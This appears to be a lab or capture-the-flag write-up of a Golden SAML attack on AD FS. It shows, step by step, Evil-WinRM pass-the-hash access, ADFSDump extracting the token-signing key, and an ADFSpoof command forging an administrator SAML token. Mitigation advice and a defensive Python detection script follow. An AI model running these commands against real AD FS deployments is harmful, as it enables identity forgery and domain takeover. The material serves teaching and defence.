AD FS

ADFSDump

Precompiled:

# evil-winrm -u 'adfs_gmsa$'  -H '3<-SNIP->07a' -i 10.10.11.24

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload ADFSDump.exe

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /workspace/ADFSDump.exe to C:\Users\adfs_gmsa$\Documents\ADFSDump.exe

Data: 40276 bytes of 40276 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> .\ADFSDump.exe
    ___    ____  ___________ ____
   /   |  / __ \/ ____/ ___// __ \__  ______ ___  ____
  / /| | / / / / /_   \__ \/ / / / / / / __ `__ \/ __ \
 / ___ |/ /_/ / __/  ___/ / /_/ / /_/ / / / / / / /_/ /
/_/  |_/_____/_/    /____/_____/\__,_/_/ /_/ /_/ .___/
                                              /_/
Created by @doughsec


## Extracting Private Key from Active Directory Store
[-] Domain is domain.htb
[-] Private Key: FA-DB-3A-06-<-SNIP->21-29-61-CB-21-C7

<-SNIP->

ADFSpoof

Golden SAML

  1. Dump the AD FS configuration with ADFSDump

  2. Save the private key to a file in the appropriate (raw binary) format

echo '8D-AC-A4-90<-SNIP->-58-FB-9D-A1' | tr -d '-' | xxd -r -p > private_key.bin

  3. Save the encrypted signing token in binary format

base64 -d token.enc > token.bin

  4. Forge the Golden SAML token

python ADFSpoof.py -b ../token.bin ../private_key.bin -s core.domain.htb saml2 --endpoint https://core.domain.htb:8443/adfs/saml/postResponse --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'DOMAIN\administrator' --rpidentifier https://core.domain.htb:8443 --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>DOMAIN\administrator</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'

Mitigation

The following security controls should be implemented to mitigate a Golden SAML attack:

  • Ensure the AD FS service account is a gMSA. This minimises the likelihood of the account being compromised via other techniques, such as Kerberoasting or DCSync.

  • Ensure the AD FS service account is used only for AD FS and no other purpose. Restricting the account to AD FS reduces its attack surface, because its credentials are never exposed to other systems.

  • Ensure passwords for AD FS server local administrator accounts are long (30-character minimum), unique, unpredictable and managed. Microsoft’s Local Administrator Password Solution (LAPS) can be used to achieve this for local administrator accounts. Local administrator accounts can be targeted by malicious actors to gain access to AD FS servers. For this reason, these accounts need to be protected from compromise.

  • Limit access to AD FS servers to only privileged users that require access. This may be a smaller subset of privileged users than the Domain Admins security group. This reduces the number of opportunities for malicious actors to gain access to AD FS servers.

  • Restrict privileged access pathways to AD FS servers to jump servers and secure admin workstations using only the ports and services that are required. AD FS servers are classified as ‘Tier 0’ assets within Microsoft’s ‘Enterprise Access Model’.

  • Only use AD FS servers for AD FS and ensure no other non-security-related services or applications are installed. This reduces the attack surface of AD FS servers as there are fewer services, ports and applications that may be vulnerable and used to compromise an AD FS server.

  • Centrally log and analyse AD FS server logs in a timely manner to identify malicious activity. If malicious actors gain privileged access to AD FS servers, this activity should be identified as soon as possible to respond and limit the impact.

  • Encrypt and securely store backups of AD FS servers and limit access to only Backup Administrators. Backups of AD FS servers need to be afforded the same security as the actual AD FS servers. Malicious actors may target backup systems to gain access to critical and sensitive computer objects, such as AD FS servers.

  • Rotate AD FS token-signing and encryption certificates every 12 months, or sooner if an AD FS server has been compromised or is suspected of having been compromised. Both certificates need to be rotated twice in rapid succession to revoke all existing AD FS tokens.
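As an added defender-side example (not code from the page, ADFSDump or ADFSpoof), one way to act on the logging control above: correlate relying-party sign-ins with AD FS Event ID 1200 ("The Federation Service issued a valid token") records and flag accepted tokens the farm never issued. The record layouts and all sample entries are constructed.

```python
"""Flag relying-party SAML sign-ins that AD FS never recorded as issued.

A Golden SAML token is signed offline with the stolen token-signing key, so the
relying party accepts it while no AD FS server logs Event ID 1200 for that
user at that time. The gap between the two log sources is the detection.
"""
from datetime import datetime, timedelta

RP = "https://core.domain.htb:8443"  # relying-party identifier used on the page

# Constructed AD FS Event ID 1200 records (not real log exports), reduced to
# the fields the correlation needs.
ADFS_EVENTS = [
    {"event_id": 1200, "time": "2024-05-01T09:00:05", "user": "DOMAIN\\alice", "rp": RP},
    {"event_id": 1200, "time": "2024-05-01T09:30:12", "user": "DOMAIN\\bob", "rp": RP},
]

# Constructed relying-party sign-in records: what the RP logged when it
# accepted a SAML response naming this AD FS instance as the issuer.
RP_SIGNINS = [
    {"time": "2024-05-01T09:00:07", "nameid": "DOMAIN\\alice", "rp": RP},
    {"time": "2024-05-01T09:30:13", "nameid": "DOMAIN\\bob", "rp": RP},
    {"time": "2024-05-01T10:30:00", "nameid": "DOMAIN\\bob", "rp": RP},            # nothing issued then
    {"time": "2024-05-01T11:45:00", "nameid": "DOMAIN\\administrator", "rp": RP},  # never issued at all
]


def find_unissued_signins(adfs_events, rp_signins, window=timedelta(minutes=5)):
    """Return RP sign-ins with no AD FS 1200 event for the same user and RP
    issued within `window` before the sign-in was accepted."""
    issued = [
        (datetime.fromisoformat(e["time"]), e["user"].lower(), e["rp"])
        for e in adfs_events
        if e["event_id"] == 1200
    ]
    suspicious = []
    for s in rp_signins:
        seen_at = datetime.fromisoformat(s["time"])
        matched = any(
            user == s["nameid"].lower()
            and rp == s["rp"]
            and timedelta(0) <= seen_at - issued_at <= window
            for issued_at, user, rp in issued
        )
        if not matched:
            suspicious.append(s)
    return suspicious


if __name__ == "__main__":
    for hit in find_unissued_signins(ADFS_EVENTS, RP_SIGNINS):
        print(f"{hit['time']} {hit['nameid']} accepted by {hit['rp']} with no AD FS issuance event")
```

Forwarding both the AD FS Security/Admin events and the relying party's sign-in logs to the same SIEM is what makes this correlation possible; either source alone looks normal.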

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
